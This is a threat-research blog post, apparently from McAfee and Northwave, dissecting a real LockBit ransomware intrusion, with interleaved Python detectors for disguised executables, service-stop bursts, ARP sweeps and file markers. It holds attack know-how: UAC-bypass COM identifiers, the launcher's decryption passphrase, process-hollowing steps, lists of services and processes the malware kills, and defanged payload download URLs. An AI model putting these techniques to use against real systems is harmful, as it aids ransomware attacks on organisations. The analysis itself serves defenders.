
Tales From the Trenches; a Lockbit Ransomware Story

In collaboration with Northwave

As we highlighted previously across two blogs, targeted ransomware attacks have increased massively over the past months. In our first article, we discussed the growing pattern of targeted ransomware attacks where the primary infection stage is often an info-stealer kind of malware used to gain credentials/access to determine if the target would be valuable for a ransomware attack. In the second part, we described the reconnaissance phase of an attacker that controls an infected host or a valid account to access a remote service. Many of them are using a similar manual modus operandi as we highlighted in the earlier blogs.

We believe there is real opportunity to learn from incident response cases and previous attacks, hence why this blog is dubbed ‘tales from the trenches’. In collaboration with Northwave, this article describes a real-life case of a targeted ransomware attack. During one of their recent incident responses, Northwave encountered a relatively new family of ransomware called LockBit performing a targeted attack. First sighted in late 2019, under the name .abcd virus, this piece of ransomware was more a revision than evolution when compared with earlier attacks. Like the previous posts in this blog series, we describe the different stages of the attack and recovery, including a thorough analysis of the ransomware and the attackers behind it.

In this blog we’ll cover:

LockBit Telemetry Map

We gathered telemetry through our McAfee Global Threat Intelligence (GTI) database on the different LockBit samples we analyzed in our research. The global spread is currently limited, as this ransomware is relatively new and heavily targeted.

Figure 1: Telemetry map

Initial Access

As in all ransomware cases, the attacker has to gain initial access to the network somehow. In this particular case the attacker performed a brute force attack on a web server running an outdated VPN service. Based on our research it took several days for the brute force attack to crack the password of the ‘Administrator’ account. With this account, a member of the administrator group, the attacker immediately obtained the proverbial “keys to the kingdom”, with all the permissions needed for a successful attack. Unfortunately, this is not a unique case; external-facing systems should always have multi-factor authentication enabled where possible. In addition, an organization should apply a least-privilege strategy to system access. Targeted ransomware attackers leverage the “human factor” across the whole organization. It is no longer the typical “end user clicking on a malicious link” that causes the complete lock-up of a company; the human factor in targeted ransomware attacks goes much deeper. Attackers successfully leverage weaknesses in security policy and misconfigurations across an entire organization, from end user to Domain Administrator.

Infiltrating the Network

To infiltrate the network, the attacker had to take several steps to make sure the ransomware attack was successful. An attacker always wants to infect as many systems as possible to effectively halt the business process and urge the victim to pay the ransom.

Credentials & Privileges

As mentioned previously, the attacker was successful in guessing the password of the Administrator account using a brute force attack. With this, the attacker immediately had all the necessary privileges for deploying the ransomware successfully. In other cases, as we described in our second blog, the attacker often uses known post-exploitation frameworks, for privilege escalation, lateral movement and performing any additional actions on their objective. Since quite a few of these frameworks are readily available we often call this the “GitHubification” of attack tools. In this case however, the attacker could actually skip this step and continue with the network reconnaissance and deployment of the ransomware immediately, since a high privileged account was already compromised.

Lateral Movement

With the administrator-level account, the attacker used SMB to perform network reconnaissance, resulting in an overview of accessible hosts. Subsequently, the attacker used the internal Microsoft Remote Access Server (RAS) to access these systems using either the administrator or the LocalSystem account. The LocalSystem account is a built-in Windows account; it is the most authoritative account on a local Windows instance (more powerful than any admin account). Using these accounts, the attacker owned these systems and could do anything they wanted, including turning off any endpoint security products. Interestingly, both the lateral movement and the deployment of the ransomware were entirely automated.

Deployment of the Ransomware

This specific case was a classic hit and run. After gaining access to the initial system using the brute-forced administrator account, the attacker logged in and deployed the ransomware almost immediately. For the attacker, this was a relatively straightforward process since the ransomware spreads itself. The deployment of the ransomware on one single host remotely instructed the other hosts in the network to run the following PowerShell command:

Figure 2: PowerShell execution to download LockBit

This command retrieves a .png file from a website that has probably been compromised. There are two versions of the .png file, one for .NET version 4 and one for version 3.5. The PowerShell command checks which version it needs by getting the version number of the common language runtime that is running the current process. If this starts with ‘V4’, the .png for version 4 is downloaded; otherwise it downloads the .png for version 3.5 via the URLs below:

  • https://espet[.]se/images/rs35.png
  • https://espet[.]se/images/rs40.png

What is interesting in this case is that each distinct host downloads the ransomware itself. Hence, the attacker only needed access to one system with an account having enough privileges to automatically make all other hosts in the network download and execute it.

Malware Analysis

For our analysis, we will use the file found in our investigation, the details of which are:

  • File name: rs35.png
  • SHA1: 488e532e55100da68eaeee30ba342cc05810e296
  • SHA256: ca57455fd148754bf443a2c8b06dc2a295f014b071e3990dd99916250d21bc75
  • Size: 546.00 KB
  • PDB: c:\users\user\work\code\dotnet\regedit-64\regedit-64\obj\release\rs35.pdb
  • GUID: 84e7065-65fe-4bae-a122-f967584e31db

Technical Analysis

The file we found in our investigation was a dropper renamed as a .png file. When we first opened the .png files we were expecting a real image, with perhaps some steganography inside, but what we saw instead was the header of a portable executable, so no steganographic pictures this time. The PE is a .NET executable compiled with Microsoft Visual C# v7.0 / Basic .NET.
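The mismatch described above (a file served as .png that is really a PE, and a .NET one at that) is cheap to check at a proxy or in a sandbox. The following is an added example, not code from the post or from McAfee: it reads the DOS header, locates the PE signature via e_lfanew, and inspects data directory 14 (the CLR runtime header) to tell a .NET launcher from a native PE. The builder that produces a constructed minimal PE image exists only so the example runs offline; it is not a real sample.

```python
import struct

# Signatures: what a genuine PNG starts with versus the DOS/PE headers of a dropper.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
DOS_SIGNATURE = b"MZ"
PE_SIGNATURE = b"PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x14C
CLR_RUNTIME_DIRECTORY_INDEX = 14  # data directory 14 holds the .NET (CLR) header


def classify_blob(data: bytes) -> dict:
    """Classify a downloaded blob as a real PNG, a PE (noting .NET assemblies), or unknown."""
    result = {"kind": "unknown", "dotnet": False, "machine": None}
    if data.startswith(PNG_MAGIC):
        result["kind"] = "png"
        return result
    if len(data) < 0x40 or data[:2] != DOS_SIGNATURE:
        return result
    # e_lfanew at offset 0x3C gives the file offset of the PE signature.
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        result["kind"] = "mz-stub"  # MZ header without a valid PE header (e.g. truncated download)
        return result
    result["kind"] = "pe"
    coff = e_lfanew + 4
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    result["machine"] = machine
    opt = coff + 20
    if opt_size < 2 or opt + 2 > len(data):
        return result
    magic = struct.unpack_from("<H", data, opt)[0]
    # NumberOfRvaAndSizes / DataDirectory sit at different offsets in PE32 and PE32+.
    if magic == 0x10B:      # PE32
        ndirs_off, dd_off = opt + 0x5C, opt + 0x60
    elif magic == 0x20B:    # PE32+
        ndirs_off, dd_off = opt + 0x6C, opt + 0x70
    else:
        return result
    if ndirs_off + 4 > len(data):
        return result
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    entry = dd_off + CLR_RUNTIME_DIRECTORY_INDEX * 8
    if ndirs > CLR_RUNTIME_DIRECTORY_INDEX and entry + 8 <= len(data):
        rva, size = struct.unpack_from("<II", data, entry)
        result["dotnet"] = rva != 0 and size != 0
    return result


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when a file served as an image is really an executable, as with rs35.png / rs40.png."""
    kind = classify_blob(data)["kind"]
    return filename.lower().endswith((".png", ".jpg", ".jpeg", ".gif", ".bmp")) and kind in ("pe", "mz-stub")


def build_fake_dotnet_pe() -> bytes:
    """Constructed minimal PE32 image carrying a CLR directory entry; not a real sample, not runnable."""
    buf = bytearray(0x40)
    buf[:2] = DOS_SIGNATURE
    struct.pack_into("<I", buf, 0x3C, 0x40)                     # e_lfanew: PE header follows DOS header
    buf += PE_SIGNATURE
    buf += struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                         # standard PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 0x5C, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 14 * 8, 0x2008, 0x48)    # CLR runtime header RVA / size
    return bytes(buf + opt)


if __name__ == "__main__":
    sample = build_fake_dotnet_pe()
    print(classify_blob(sample), extension_mismatch("rs35.png", sample))
```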

Figure 3: Static analysis of LockBit

Entropy-wise it looks tidy too, showing no stray sections or big spikes in the graph, which indicates that the malware author did not use obfuscation.

Figure 4: Entropy analysis

Figure 5: Portex visualization of LockBit

This file is a .NET launcher. Examining the Main() function in the code shows that an array containing a particularly long AES encrypted base64 string (in the variable named ‘exeBuffer’) carries the executable for the actual ransomware.

Figure 6: .NET launcher buffer

This encrypted string is decrypted using the key ENCRYPTION29942. The first 32 bytes of the long ExeBuffer string are used as the salt in the encryption scheme, where ENCRYPTION29942 is the passphrase.

Figure 7: Launcher calls & functions

Remarkably, the script checks for the existence of vbc.exe on its designated host. Usually, this binary is a digitally signed executable from Microsoft; however, in this case, the malware uses it for process hollowing.

By statically analyzing the file we can spot the usage of:

  • NtUnmapViewOfSection
    • LockBit uses this API in order to unmap the original code in execution
  • NtWriteVirtualMemory
    • The malware writes the base address of the injected image into the PEB via NtWriteVirtualMemory
  • VirtualAllocEx
    • To allocate the space before injecting the malicious code

The VBC utility is the visual basic compiler for Windows and LockBit uses it to compile and execute the code on the fly directly in execution. If the vbc utility does not exist on the system, the malware downloads the original vbc.exe file from the same malicious URL as seen before. After executing vbc.exe, the malware replaces the objects in memory with the code for deploying the ransomware (as deduced from the exeBuffer).

Figure 8: If VBC does not exist, the launcher will download it

Payload Analysis

Analysis of the exeBuffer shows several appealing elements. It starts with a UAC Bypass via {3E5FC7F9-9A51-4367-9063-A120244FBEC7} exploiting the ICMLuaUtil elevated COM Interface-Object[1], as seen in other ransomware families like Trickbot and MedusaLocker.

Subsequently, the script uses another variant of the UAC Bypass. The CLSID {D2E7041B-2927-42fb-8E9F-7CE93B6DC937} refers to the ColorDataProxy COM Object which is classified as the same Bypass method in hfiref0x’s UACME #43[2].

In order to be stealthier, LockBit ransomware loads its modules dynamically with LoadLibraryA instead of listing them in the import address table (IAT). This method is employed to avoid detection by static engines.

Figure 9. Name of the modules in the code

During execution, the malware opens the Service Manager with the function “OpenSCManagerA” and saves the handle. If the call fails, it compares the error returned by the “GetLastError” function against ERROR_ACCESS_DENIED.

Figure 10. Access to the Service Manager

Upon access to the Service Manager, LockBit creates a thread to manage services, terminate processes and delete the shadow volumes plus the contents of the recycle bin.

In this thread the names of the services that the malware will try to manage are hardcoded, in an obfuscated form to make them harder to spot:

Figure 11. Hardcoded service names

The list of services LockBit tries to stop is:

  • DefWatch (Symantec Antivirus)
  • ccEvtMgr (Norton AntiVirus Event Manager)
  • ccSetMgr (Common Client Settings Manager Service of Symantec)
  • SavRoam (Symantec Antivirus)
  • sqlserv
  • sqlagent
  • sqladhlp
  • Culserver
  • RTVscan (Symantec Antivirus Program)
  • sqlbrowser
  • QBIDPService (QuickBooks by Intuit)
  • QuickBoooks.FCS (QuickBooks by Intuit)
  • QBCFMonitorService (QuickBooks by Intuit)
  • sqlwriter
  • msmdsrv (Microsoft SQL Server Analysis or Microsoft SQL Server)
  • tomcat6 (Apache Tomcat)
  • zhundongfangyu (this belongs to the 360 security product from Qihoo company)
  • vmware-usbarbitator64
  • vmware-converter
  • dbsrv12 (Creates, modifies, and deletes SQL Anywhere services.)
  • dbeng8 (Sybase’s Adaptive Server Anywhere version 8 database program)
  • wrapper (Java Service?)

If the malware finds one of these services when querying its status with the function “QueryServiceStatusEx”, LockBit first enumerates the services that depend on it and, when that succeeds, stops the service with the function “ControlService”.
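From the defender's side, a burst of stop events for exactly these services on one host is a usable signal. The following is an added example, not the post's or McAfee's own code: it runs a sliding-window correlation over service-stop log lines using the service list above. The line format is an assumption (constructed, simplified Event ID 7036 records; real 7036 events carry the service display name, so production use needs a display-name to service-name mapping), and the sample log is constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Services LockBit tries to stop, as listed above (lower-cased for case-insensitive matching).
LOCKBIT_TARGET_SERVICES = {s.lower() for s in [
    "DefWatch", "ccEvtMgr", "ccSetMgr", "SavRoam", "sqlserv", "sqlagent", "sqladhlp",
    "Culserver", "RTVscan", "sqlbrowser", "QBIDPService", "QuickBoooks.FCS",
    "QBCFMonitorService", "sqlwriter", "msmdsrv", "tomcat6", "zhundongfangyu",
    "vmware-usbarbitator64", "vmware-converter", "dbsrv12", "dbeng8", "wrapper",
]}

# Assumed, simplified export format: "<date> <time> <host> 7036 The <svc> service entered the stopped state."
STOP_LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) 7036 "
    r"The (?P<svc>.+?) service entered the stopped state\.$"
)


def parse_stop_events(lines):
    """Yield (timestamp, host, service) for every line that is a service-stop record."""
    for line in lines:
        m = STOP_LINE_RE.match(line.strip())
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["host"], m["svc"]


def detect_service_stop_bursts(lines, threshold=3, window=timedelta(seconds=60)):
    """Alert once per host when >= threshold distinct LockBit-targeted services stop inside a sliding window.

    Events are assumed to be in chronological order, as in a log export.
    """
    recent = defaultdict(deque)   # host -> deque of (timestamp, service) inside the window
    alerts, alerted = [], set()
    for ts, host, svc in parse_stop_events(lines):
        name = svc.lower()
        if name not in LOCKBIT_TARGET_SERVICES:
            continue                # Spooler and friends stopping is not our signal
        q = recent[host]
        q.append((ts, name))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = {s for _, s in q}
        if len(distinct) >= threshold and host not in alerted:
            alerted.add(host)
            alerts.append({"host": host, "first": q[0][0], "last": ts, "services": sorted(distinct)})
    return alerts


# Constructed sample: FS01 shows the LockBit pattern, WS07 shows unrelated noise.
SAMPLE_LOG = [
    "2020-02-20 03:14:01 FS01 7036 The sqlserv service entered the stopped state.",
    "2020-02-20 03:14:02 FS01 7036 The sqlwriter service entered the stopped state.",
    "2020-02-20 03:14:02 WS07 7036 The Spooler service entered the stopped state.",
    "2020-02-20 03:14:05 FS01 7036 The DefWatch service entered the stopped state.",
    "2020-02-20 03:14:09 FS01 7036 The vmware-converter service entered the stopped state.",
    "2020-02-20 03:20:00 WS07 7036 The sqlbrowser service entered the stopped state.",
]

if __name__ == "__main__":
    for alert in detect_service_stop_bursts(SAMPLE_LOG):
        print(alert)
```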

Figure 12. Stopping target service

LockBit prepares obfuscated Unicode strings containing commands to delete the shadow volumes and disable the system’s protections on the next boot.

Figure 13. Prepare the commands to delete shadow volumes and disable protections on boot

The malware stores these strings both in the rdata section, as is common across malware families, and in its own code, as shown in the previous screenshots. The malware uses both sets of strings.

During its execution, LockBit takes a snapshot of the processes running on the system and checks whether certain processes are on its list, using the function “OpenProcess”; if a listed process is present, it terminates it with the “TerminateProcess” function.

The list of processes that LockBit checks for is:

  • wxServer
  • wxServerView
  • sqlservr
  • RAgui
  • supervise
  • Culture
  • RTVScan
  • DefWatch
  • sqlbrowser
  • winword
  • qbupdate
  • QBCFMonitorService
  • axlbridge
  • QBIDPService
  • httpd
  • fdlauncher
  • MsDtSrvr
  • tomcat6
  • zhudongfangyu
  • vmware-usbarbitator64
  • vmware-converter
  • dbsrv12

This process check is performed through a trick using the “PathRemoveExtensionA” function: the .exe extension is stripped from each name in the list before comparison, which makes the check harder to spot.

Figure 14. Remove extension and check the process name

In our analysis, we saw how the ransomware dynamically uses the function “IsWow64Process” to check whether the victim OS is an x64 system and then uses the functions “Wow64DisableWow64FsRedirection” and “Wow64RevertWow64FsRedirection”. If the malware can access these functions, it uses the first to destroy all shadow volumes and the protections of the OS on the next boot and later restores the redirection with the other function. If it cannot obtain these functions, LockBit deletes the shadow volumes directly through the function “ShellExecuteA” or with the function “CreateProcessA”.

Deletion of files within the recycle bin is executed with the function “SHEmptyRecycleBinW”.

Figure 15. Delete the contents of the recycle bin

Static analysis of the sample shows that LockBit will check the machine to see if it has support for AES instructions in the processor with the “cpuid” opcode.

Figure 16. Check for AES instruction support in the CPU

Another check made by the ransomware is for the existence of the SSE2 set of instructions:

Figure 17. Check for SSE2 instructions in the CPU

After finishing this process, the malware will try to delete itself with the next command using “ShellExecuteExW”:

Figure 18. Auto-deletion of the malware

The Ransom Note

The ransom note is rather compact because the author hardcoded the content right in the code without using any obfuscation or encryption. The text file containing the ransom note is created in every directory after encryption and called Restore-My-Files.txt.

Figure 19: Content that is placed in Restore-My-Files.txt

Victim Information Stored in the Registry Key

During execution, LockBit creates two registry entries on the infected system, named full and public.

These are created under HKEY_CURRENT_USER\SOFTWARE\LockBit. The data stored there belongs to the infected victim, so that the victim can be identified later.

Figure 20: LockBit registry keys

Lastly, after finishing the encryption, the desktop wallpaper is changed to a message for the user, saying that LockBit encrypted the host.

Figure 21: LockBit wallpaper after encryption

LockBit Filemarker

Some of the ransomware families we analyzed share a common file marker across all encrypted files, used to verify the origin of a file. The operator’s control panel can use this digital marker to verify that it was this ransomware that encrypted the files.

This is an example for the first version of LockBit, which used the following file marker:

C8 41 D0 BE AB 3F 0D 59 7B BF CF 40 C8 81 63 CD

If we compare two encrypted files, we can spot how the file marker matches in both encrypted files:
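During recovery, the marker above and the appended extensions reported in this post (.abcd for the first version, .lockbit later) give a quick way to triage which files were actually touched. The following is an added example, not the post's or McAfee's code: it scans a file for the 16-byte marker in chunks with overlap (so a marker straddling a chunk boundary is still found) and combines the result with the extension check. The post does not state where in the file the marker sits, so the whole file is scanned; the sample files are constructed stand-ins, not real encrypted data.

```python
import io

# File marker of the first LockBit version, as quoted above (16 bytes).
LOCKBIT_V1_MARKER = bytes.fromhex("C841D0BEAB3F0D597BBFCF40C88163CD")
# Extensions reported in the post for version 1 (.abcd) and version 2 onwards (.lockbit).
LOCKBIT_EXTENSIONS = (".abcd", ".lockbit")


def scan_stream(fobj, marker=LOCKBIT_V1_MARKER, chunk_size=1 << 20):
    """Return the file offset of the first occurrence of marker, or -1.

    Reads in chunks and carries the last len(marker)-1 bytes over, so a marker that
    straddles a chunk boundary is still detected and large files are not read whole.
    """
    overlap = len(marker) - 1
    carry, base = b"", 0          # base: file offset at which `carry` starts
    while True:
        block = fobj.read(chunk_size)
        if not block:
            return -1
        buf = carry + block
        idx = buf.find(marker)
        if idx != -1:
            return base + idx
        carry = buf[-overlap:] if len(buf) > overlap else buf
        base += len(buf) - len(carry)


def triage_file(name, data, marker=LOCKBIT_V1_MARKER, chunk_size=512):
    """Combine marker presence and appended extension into a verdict for one file."""
    offset = scan_stream(io.BytesIO(data), marker, chunk_size)
    has_ext = name.lower().endswith(LOCKBIT_EXTENSIONS)
    if offset != -1 and has_ext:
        verdict = "encrypted"        # both indicators agree
    elif offset != -1:
        verdict = "marker-only"      # marker without the extension: inspect manually
    elif has_ext:
        verdict = "extension-only"   # renamed but no marker: may be a different version or a decoy
    else:
        verdict = "clean"
    return {"name": name, "marker_offset": offset, "verdict": verdict}


def build_samples():
    """Constructed stand-ins for encrypted and clean files; not real samples."""
    filler = bytes(range(256)) * 4   # 1024 bytes of monotonically increasing filler, marker-free
    return {
        "report.docx.abcd": filler + LOCKBIT_V1_MARKER + b"\x00" * 8,
        "notes.txt": filler,
        "odd.bin": filler[:100] + LOCKBIT_V1_MARKER,
        "renamed.lockbit": filler,
    }


if __name__ == "__main__":
    for name, data in build_samples().items():
        print(triage_file(name, data))
```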

Figure 22: File marker used by LockBit

SMB Spreading

Analyzing LockBit in our environment, we identified that it can spread within the same local network. Looking at the network traffic, we spotted multiple ARP requests used to find other hosts in the same network segment.

Figure 23: LockBit ARP traffic captured in the analysis

If one of these ARP requests finds a live host, LockBit starts a legitimate SMB connection in order to deploy the ransomware on that machine.
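The ARP sweep that precedes the SMB connection is visible on the wire long before the encryption starts. The following is an added example, not code from the post or from McAfee: it flags any source that asks who-has for many distinct addresses inside a short sliding window. It parses tcpdump-style text lines (the format is an assumption, chosen so the example runs without a capture library), and the capture it analyzes is constructed here.

```python
import re
from collections import defaultdict, deque

# Assumed tcpdump -n line shape: "HH:MM:SS.ffffff ARP, Request who-has <target> tell <source>, length 28"
ARP_REQUEST_RE = re.compile(
    r"^(?P<h>\d{2}):(?P<m>\d{2}):(?P<s>\d{2}\.\d+) ARP, Request who-has (?P<target>[\d.]+) "
    r"(?:\(\S+\) )?tell (?P<src>[\d.]+)"
)


def parse_arp_requests(lines):
    """Yield (seconds_since_midnight, source, target) for each ARP request line; replies are ignored."""
    for line in lines:
        m = ARP_REQUEST_RE.match(line.strip())
        if m:
            t = int(m["h"]) * 3600 + int(m["m"]) * 60 + float(m["s"])
            yield t, m["src"], m["target"]


def detect_arp_sweeps(lines, threshold=8, window=5.0):
    """Alert once per source that probes >= threshold distinct IPs within `window` seconds.

    Lines are assumed to be in capture order. Normal hosts resolve a handful of peers over
    minutes; a sweep walks a subnet in a burst, which is what the sliding window catches.
    """
    recent = defaultdict(deque)   # source -> deque of (time, target) inside the window
    alerts, flagged = [], set()
    for t, src, target in parse_arp_requests(lines):
        q = recent[src]
        q.append((t, target))
        while q and t - q[0][0] > window:
            q.popleft()
        targets = {tg for _, tg in q}
        if len(targets) >= threshold and src not in flagged:
            flagged.add(src)
            alerts.append({"source": src, "start": q[0][0], "end": t, "targets": sorted(targets)})
    return alerts


def build_sample_capture():
    """Constructed capture: 10.1.2.20 sweeps .1-.12 in about a second; 10.1.2.30 behaves normally."""
    lines = []
    for i in range(1, 13):
        ts = f"03:14:{7 + i // 10:02d}.{(i % 10) * 100000:06d}"
        lines.append(f"{ts} ARP, Request who-has 10.1.2.{i} tell 10.1.2.20, length 28")
    lines += [
        "03:14:07.500000 ARP, Request who-has 10.1.2.1 tell 10.1.2.30, length 28",
        "03:14:07.600000 ARP, Reply 10.1.2.1 is-at 00:11:22:33:44:55, length 28",
        "03:16:00.000000 ARP, Request who-has 10.1.2.2 tell 10.1.2.30, length 28",
    ]
    return sorted(lines)   # keep capture order by timestamp


if __name__ == "__main__":
    for alert in detect_arp_sweeps(build_sample_capture()):
        print(alert["source"], "probed", len(alert["targets"]), "hosts between", alert["start"], "and", alert["end"])
```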

Figure 24: LockBit SMB traffic captured in the analysis

If the SMB connection is successful, LockBit will execute the following PowerShell command to download the .NET launcher that will decompress and execute LockBit in a new system:

LockBit Ransomware Evolution:

LockBit is new on the scene, but we noticed that the authors added several new features and improved the ransomware several times. That means an active group is behind it, probably acting on feedback from its operations. The graph, which we extracted by statically analyzing all the internal functions and comparing them across the samples, illustrates this development cycle:

For this investigation, we found different LockBit versions with different features between them:

LockBit Version 1

This first version contains unique features compared to other versions we found in the wild.

These features are:

  • IPLO (IPLogger geolocalization service)
  • Persistence through the COM interface and the CurrentVersion\Run registry key
  • A different extension used in the encrypted files
  • Debug file created for debugging purposes
  • HIGH CPU Usage in the encryption process
  • The reuse of a MUTEX observed in other ransomware families

IPLO.RU geo-localization service:

One of the interesting items we found was that LockBit tries to identify the victim’s geo-location, through the URL IPLO.RU, requesting a static TXT file in that service.

Figure 25: LockBit IPLO.RU geolocation traffic captured in the analysis

The communication to this page is through HTTPS; we intercepted the traffic to get the reply from the remote server:

Figure 26: SSL decrypted traffic

Analyzing statically the code in LockBit, we found that this URL is not resolved dynamically in execution; it is hardcoded in the binary:

Figure 27: Hardcoded URL of IPLO service

Creating persistence through Current version Run and COM task schedule:

There are many ways to gain persistence in a system. This first version of LockBit uses a task schedule through the COM interface to gain persistence.

Figure 28: Persistence using the COM interface

LockBit also uses a reboot persistence method based on the Windows registry:

Using the CurrentVersion\Run key allows it to survive a reboot if the system shuts down.

LockBit therefore uses two persistence methods: the COM CLSID and CurrentVersion\Run.

.abcd extension used:

The first version of LockBit uses the .abcd extension every time it encrypts a file; this is a unique difference between this version and the other versions found.

Ransom note used:

LockBit in this first version used a different ransom note with a different message:

Figure 29: LockBit ransomware note

Debug file created in execution:

LockBit’s first version skips some files in the encryption process, and every time it skips one it writes the log information to resultlog6.reg:

Figure 30: Debug file created by LockBit

High CPU usage:

We analyzed the performance of the encryption and we noted how LockBit uses the CPU heavily in the encryption process:

Figure 31: LockBit performance in execution

PhobosImposter static MUTEX used:

In October 2019, the community saw PhobosImposter using the mutex XO1XADpO01 in its executions, and the same mutex is used by LockBit in this first version. We analyzed the base code of both samples and did not find any code overlap, but it is quite a random string to share by coincidence.

This is the function used to create the mutex:

Figure 32. Creation and check of the hardcoded mutex

LockBit Version 2

This LockBit version came out with the following changes:

  • Appended extension changed
  • The debug function removed
  • Some of the samples came packed either with UPX or with a Delphi packer
  • One sample digitally signed

Appended extension changed:

For this version, LockBit started to append the extension .lockbit in all the encrypted files as a file marker:

Debug log function removed:

LockBit, in this new version, removed the functionality whereby it stored all the skipped files in the encryption process.

Sample delivery with different protections:

In this version we found LockBit samples packed in UPX and other custom packers, adding certain protections to the samples:

  • Extensive usage of PEB during the execution
  • The use of IsDebuggerPresent, OutputDebugString and GetLastError

All these protections are enabled by the use of packers in the delivery.

Mutex change:

The prior version of LockBit used a static mutex in all the encryptions but, in this release, it changed to be a dynamic value for every infection.

Samples digitally signed:

For all the versions we found for LockBit, only this version had a sample digitally signed:

Figure 33: LockBit sample digitally signed

LockBit Version 3

Ransomware note changed:

For this version LockBit adapted the ransomware note and used a new one:

Figure 34: LockBit 2nd version of the ransomware note

LockBit debug enabled:

After all the hunting we did, we found several samples of LockBit with some kind of status feature enabled, showing a progress window during the encryption:

Figure 35: LockBit debug enabled

This mode was only available for certain sample compilations and the status screen was different depending on the LockBit sample analyzed:

Figure 36: LockBit sample digitally signed

Tales from the Underground

When we researched the underground community for LockBit we came across a posting on several popular underground forums. A threat actor named Lockbi or LockBit is offering LockBit as a “bespoke” ransomware as a service for a limited number of partners/affiliates. We suspect LockBit ransomware really is “bespoke”, not only because of its own announcements but because we have not seen any affiliate identifiers in the ransomware, which are normally a clear sign of an actor trying to scale up operations and serve a larger number of affiliates.

The advertisement provides a general description that matches the LockBit behavior we have seen in the wild and in our analysis. As with many other cyber-criminal services, LockBit does not allow the use of the software in any of the CIS countries. This is commonly done to avoid prosecution if the threat actor resides in one of those nations.

What we also noticed was a mention around multi-threading. Ransomware families are often programmed to run multi-threaded to ensure quick and overall encryption and prevent the encryption process getting stuck on a large file. However, LockBit was specifically advertised as single threaded and the threat actor Lockbi ensures that there are no speed issues when it comes to its encryption capability.

Figure 37: The LockBit advertisement

In the advertisement it is listed that one of the features of the ransomware is a local subnet scanner and SMB propagation method, something we can confirm based on our analysis.

Also noteworthy is the use of a Jabber-bot to perform the essential functions, such as chatting, decryption and banning, replacing the need for a labor intensive admin panel that is hosted somewhere on the internet.

Figure 38: LockBit profile including the 10,5 BTC deposit

It seems that LockBit has joined the underground scene with a clear determination to do business; the authors have put down a deposit in excess of 10,5 BTC, a bit shy of 75K USD. Putting a deposit in escrow is a way to demonstrate that the seller is financially invested and not out to scam potential partners; the seller would lose the deposit if they did not keep their end of the deal. Our telemetry shows that LockBit activity is still limited today, but we can definitely expect to see more bespoke LockBit attacks in the near future.


Going back to the real-life case, there were no recent offline backups. So, with the backup servers (including the backups) encrypted as well and a complete rebuild not being an option, there was no way for a successful and swift recovery other than by paying the ransom.

Both McAfee’s and Northwave’s position is that ransoms should not be paid. Paying not only supports the criminal business model but, as we have shown in our research, also finances other forms of crime, such as the online drug trade.

In this specific case the victim chose to pay the ransom. The first step for recovery was to get in contact with the hacker following the instructions from the ransom note (Restore-my-files.txt) as depicted below.

Figure 39: LockBit ransomware note

Interestingly, as opposed to earlier known cases of LockBit (or .abcd virus) where contact with the attacker occurred via email addresses mentioned in the ransom note, in this case, the attacker developed an online ‘help desk’ accessible via a .onion address. Helpful as the hacker is, they even provided clear instructions on how to access this .onion address with the Tor browser. Although the ransom note claims there was private data obtained, Northwave did not find any evidence for this on the compromised systems.

Figure 40: LockBit recovery page

The image above shows the helpdesk which the attacker uses to communicate with their victims. It offers a trial in which two files can be decrypted ‘for warranty’, showing that the attacker indeed holds the correct key(s) for restoring the data. For this trial it is essential to test files from different (critical) servers, since keys might differ per server. In negotiations with an attacker, always try to obtain this knowledge, since it is also relevant for your recovery strategy: if there is only one key, you know one tool will serve the entire network; if encrypted servers use distinct keys, recovery becomes increasingly difficult.

After successful decryption of two different files (from distinct servers), the chat with the attacker began. They started by asking for a network domain name (to identify the correct victim), then the attacker addressed the ransom amount. Usually, the attackers do proper research on their victims and tailor the ransom amount accordingly, which was the case here as well. Hence, negotiating on the amount of the ransom did not prove to be useful:

“We know who you are, so don’t play negotiate games.”

Trouble in Hacker Paradise

After the bitcoin transaction to the provided address was made, the helpdesk page would automatically update after six confirmations and show the download link for the decryptor.

“After 6 transaction confirmations, in a few hours decryptor will be built automatically. Don’t worry you will get it instantly once it’s built.”

Since there was nothing left to do but wait and hope for the decryptor, an attempt was made to obtain some more information from the attacker by asking about their methods. A snippet of this conversation is shown below.

Figure 41: Attacker communication

The mention of ‘weak passwords’ is, of course, entirely in line with the brute force attack described earlier. Additionally, this conversation indicates that a larger group is behind this attack, with roles separated between different participants. The helpdesk seems to be an actual helpdesk, merely following a script of actions.

After several hours and six confirmations, the decryption tool should have been ready for download. However, this is where things went differently: a technical issue caused the decryptor not to be generated automatically, for which the helpdesk kindly apologized. Unfortunately, this went on for two dubious days, with multiple excuses, before the attacker sent a link to the decryptor via the chat. Apparently unable to solve the technical issues, they chose to send it via SendSpace.

Once downloaded, the recovery phase could start. In this phase, all servers were decrypted, scanned and cleaned (or rebuilt) in a quarantined network. Subsequently, after implementing the appropriate technical and security measures, each host joined a new clean network.


As we highlighted in the first two articles, targeted ransomware attacks have increased massively over the past months, and many of them use the similar, quite manual, attack pattern we described. In this article, we provided an in-depth view of a relatively new ransomware family named LockBit. Based on a real-life case encountered by Northwave, we described a typical ransomware attack, including the modus operandi of the attackers, the recovery process, an insight into the underground that advertises the ransomware and a full technical break-down of the ransomware itself. Additionally, during our analysis we were able to obtain multiple samples of the LockBit ransomware, from which we could provide an extensive list of IOCs. McAfee will continue monitoring this threat.

